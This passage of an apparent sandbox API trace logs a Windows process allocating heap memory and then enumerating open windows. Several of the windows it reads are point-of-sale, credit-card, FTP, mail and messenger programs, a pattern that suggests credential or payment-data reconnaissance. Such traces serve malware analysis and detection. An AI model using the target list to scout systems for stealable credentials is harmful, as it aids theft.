(HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0139.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ed8 | out: hHeap=0x12c0000) returned 1 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0139.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ed8 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.768] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ef0 [0139.768] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f08 [0139.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f38 [0139.769] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f50 [0139.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x5c2) returned 0x13078a8 [0139.769] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f38 | out: hHeap=0x12c0000) returned 1 [0139.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0139.770] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x5c2) returned 0x1305730 [0139.770] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f50 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001f8 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13062f8 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ef0 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ed8 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13078a8 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.771] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f08 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300040 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f68 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e18 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0139.772] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e48 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f80 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ec0 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e78 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6de8 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ea8 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302178 | out: hHeap=0x12c0000) returned 1 [0139.773] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e00 | out: hHeap=0x12c0000) returned 1 [0139.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0139.774] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x5c2) returned 0x13078a8 [0139.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1305730 | out: hHeap=0x12c0000) returned 1 [0139.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0139.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.774] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13078a8 | out: hHeap=0x12c0000) returned 1 [0139.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0139.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.775] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.775] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0139.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70a0 [0139.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.775] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0139.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0139.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0139.776] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001f8 | out: hHeap=0x12c0000) returned 1 [0139.776] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.776] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300388 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f68 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b70a0 [0139.777] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6f98 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efea0 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ff8 [0139.777] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0139.777] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0139.778] GetWindowTextW (in: hWnd=0x10128, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.778] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0139.778] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.778] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0139.779] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.779] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.779] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.779] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.779] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.779] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.780] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.780] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.780] GetWindowTextW (in: hWnd=0x100be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.780] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.780] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.781] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.781] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.781] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.781] GetWindowTextW (in: hWnd=0x10098, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.781] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.782] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.782] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.782] GetWindowTextW (in: hWnd=0x10080, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.782] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0139.783] GetWindowTextW (in: hWnd=0x20048, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0139.783] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0139.783] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.783] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.783] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.784] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0139.784] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0139.784] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7df1a8) returned 0x9 [0139.784] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0139.784] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.784] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0139.784] GetWindowTextW (in: hWnd=0x20286, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0139.785] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0139.785] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.785] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0139.785] GetWindowTextW (in: hWnd=0x20364, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.786] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0139.786] GetWindowTextW (in: hWnd=0x10336, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0139.786] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0139.786] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0139.786] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0139.787] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0139.787] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0139.893] GetWindowTextW (in: hWnd=0x10366, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0139.893] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0139.893] GetWindowTextW (in: hWnd=0x10306, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0139.893] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0139.894] GetWindowTextW (in: hWnd=0x10344, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0139.894] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0139.894] GetWindowTextW (in: hWnd=0x10340, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0139.894] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0139.894] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Barca") returned 5 [0139.894] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0139.894] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.895] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0139.895] GetWindowTextW (in: hWnd=0x10342, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0139.895] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0139.895] GetWindowTextW (in: hWnd=0x10338, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0139.895] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0139.895] GetWindowTextW (in: hWnd=0x10330, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0139.895] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0139.896] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Far") returned 3 [0139.914] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0139.914] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0139.914] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0139.914] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0139.914] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0139.915] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0139.915] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0139.915] GetWindowTextW (in: hWnd=0x10324, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0139.915] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0139.915] GetWindowTextW (in: hWnd=0x10322, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0139.915] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0139.916] GetWindowTextW (in: hWnd=0x10320, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0139.916] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0139.916] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0139.916] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0139.916] GetWindowTextW (in: hWnd=0x10316, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0139.917] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0139.917] GetWindowTextW (in: hWnd=0x10308, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0139.917] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0139.917] GetWindowTextW (in: hWnd=0x10310, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0139.917] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0139.917] GetWindowTextW (in: hWnd=0x10314, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0139.917] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0139.918] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0139.918] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0139.918] GetWindowTextW (in: hWnd=0x10304, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0139.918] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0139.918] GetWindowTextW (in: hWnd=0x10302, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0139.919] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0139.990] GetWindowTextW (in: hWnd=0x10300, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0139.990] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0139.992] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0139.992] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0139.992] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0139.993] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0139.994] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0139.995] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0139.995] GetWindowTextW (in: hWnd=0x102da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0139.996] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0139.997] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0139.998] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0140.000] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0140.000] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0140.001] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0140.002] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0140.003] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0140.008] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0140.008] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0140.010] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0140.010] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0140.012] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0140.013] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fling") returned 5 [0140.013] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0140.014] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0140.014] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0140.015] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0140.016] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0140.017] GetWindowTextW (in: hWnd=0x102de, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0140.017] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0140.018] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0140.019] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0140.021] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0140.021] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0140.023] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Icq") returned 3 [0140.133] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0140.133] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Skype") returned 5 [0140.133] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0140.133] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0140.133] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0140.133] GetWindowTextW (in: hWnd=0x20214, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0140.134] GetClassNameW 